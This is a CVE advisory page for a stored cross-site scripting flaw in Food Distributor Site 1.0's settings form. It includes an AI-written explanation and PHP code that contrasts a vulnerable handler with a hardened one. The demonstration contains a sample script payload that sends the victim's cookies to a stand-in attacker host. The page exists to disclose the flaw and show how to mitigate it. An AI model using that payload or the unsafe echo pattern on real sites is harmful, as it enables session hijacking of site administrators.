CVE-2025-6778
Description
A vulnerability, which was classified as problematic, was found in code-projects Food Distributor Site 1.0. Affected is an unknown function of the file /admin/save_settings.php. The manipulation of the argument site_phone/site_email/address leads to cross-site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Cross-Site Scripting in Food Distributor Site 1.0 via site_phone, site_email, or address parameters in /admin/save_settings.php.
A stored cross-site scripting (XSS) vulnerability exists in code-projects Food Distributor Site 1.0. The issue is in /admin/save_settings.php, where the site_phone, site_email, and address parameters are persisted as received and later rendered into HTML without validation or output encoding. An attacker can therefore inject arbitrary HTML or JavaScript through any of these three fields [1][2].
Exploitation requires an authenticated admin session, because the settings page is only reachable after login. The attack is a POST request to save_settings.php carrying the payload in one of the vulnerable parameters. The public proof-of-concept request includes a valid PHPSESSID cookie, consistent with that authentication requirement [1][2]. The vector is network-reachable in the sense that the request can be sent from any location, but the attacker must already hold admin credentials or a hijacked admin session.
Successful exploitation yields stored XSS: the script is saved with the site settings and runs in the browser of whoever next views a page that renders those values. Within the admin panel that means session hijacking, defacement, or redirection to attacker-controlled sites. The low CVSS score of 2.4 reflects the admin-authentication precondition rather than any limit on what the injected script can do once it executes.
As of publication, the vendor has provided no patch or workaround. The vendor site (code-projects.org) still offers the software for download and lists no updated release [3]. Anyone deploying or modifying the code should validate site_phone and site_email server-side and HTML-encode all three values at every point where they are written into a page; encoding at output is the control that actually neutralises the stored payload, validation only narrows what gets stored.
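As an added illustration of the mitigation just described (this is not code from the project or from the cited advisories), the block below contrasts a hypothetical minimal version of the store-and-echo pattern the advisory describes with a hardened handler. The function names, the in-memory `$store` array standing in for the settings table, and the sample payload are all assumptions; the real save_settings.php is not reproduced here.

```php
<?php
// Added illustration, not the project's code. The real /admin/save_settings.php
// is not reproduced; the handlers below are a hypothetical minimal version of
// the pattern the advisory describes: POST values stored as-is and later
// echoed into HTML without encoding, next to a hardened equivalent.

declare(strict_types=1);

// --- Vulnerable pattern (hypothetical) ---------------------------------
// Store whatever arrived and echo it raw: the classic stored-XSS shape.
function saveSettingsUnsafe(array $post, array &$store): void
{
    foreach (['site_phone', 'site_email', 'address'] as $key) {
        $store[$key] = $post[$key] ?? '';
    }
}

function renderSettingsUnsafe(array $store): string
{
    return "<p>Phone: {$store['site_phone']}</p>\n"
         . "<p>Email: {$store['site_email']}</p>\n"
         . "<p>Address: {$store['address']}</p>\n";
}

// --- Hardened pattern --------------------------------------------------
// 1. Validate what can be validated (email, phone) and reject bad input.
// 2. Encode every value at the point it is written into HTML, regardless of
//    validation, so free-text fields such as address are safe as well.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function saveSettingsSafe(array $post, array &$store): array
{
    $errors = [];

    $email = filter_var((string)($post['site_email'] ?? ''), FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $errors[] = 'site_email is not a valid e-mail address';
    }

    // Digits, spaces, +, -, parentheses only; the length cap stops junk payloads.
    $phone = trim((string)($post['site_phone'] ?? ''));
    if (!preg_match('/^[0-9+\-() ]{3,32}$/', $phone)) {
        $errors[] = 'site_phone contains disallowed characters';
    }

    // Address is free text: drop control characters, cap the length, and
    // rely on output encoding for everything else.
    $address = preg_replace('/[\x00-\x1F\x7F]/u', '', (string)($post['address'] ?? ''));
    if ($address === null || strlen($address) > 512) {
        $errors[] = 'address is malformed or too long';
    }

    if ($errors === []) {
        $store['site_phone'] = $phone;
        $store['site_email'] = $email;
        $store['address']    = $address;
    }
    return $errors;
}

function renderSettingsSafe(array $store): string
{
    return "<p>Phone: " . h($store['site_phone']) . "</p>\n"
         . "<p>Email: " . h($store['site_email']) . "</p>\n"
         . "<p>Address: " . h($store['address']) . "</p>\n";
}

// --- Demonstration with a constructed payload ---------------------------
$payload = [                                  // constructed sample input
    'site_phone' => '555-0100',
    'site_email' => 'admin@example.com',
    'address'    => '<script>document.location="https://attacker.example/?c="+document.cookie</script>',
];

$unsafe = [];
saveSettingsUnsafe($payload, $unsafe);
echo renderSettingsUnsafe($unsafe);   // the <script> tag lands in the page verbatim

$safe = [];
$errors = saveSettingsSafe($payload, $safe);
echo $errors ? implode("\n", $errors) . "\n" : renderSettingsSafe($safe);
// address now renders as &lt;script&gt;...: inert text, not markup
```

The validation step is deliberately secondary: a phone or e-mail regex would not have protected the address field, and a future template that prints a validated value into a JavaScript string or an attribute still needs context-appropriate encoding. Apply `h()` (or the framework's equivalent) in every template that reads these settings, including any public-facing footer or contact page, not only the admin view.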
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- code-projects Food Distributor Site, version 1.0 (range: = 1.0)
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- [1] github.com/fubxx/CVE/blob/main/Food%20Distributor%20system%20XSS%202.md (NVD: Exploit, Third Party Advisory)
- [2] github.com/fubxx/CVE/blob/main/Food%20Distributor%20system%20XSS%203.md (NVD: Exploit, Third Party Advisory)
- vuldb.com (NVD: Third Party Advisory, VDB Entry)
- [3] code-projects.org (NVD: Product)
- vuldb.com (NVD: Permissions Required, VDB Entry)
News mentions
No linked articles in our index yet.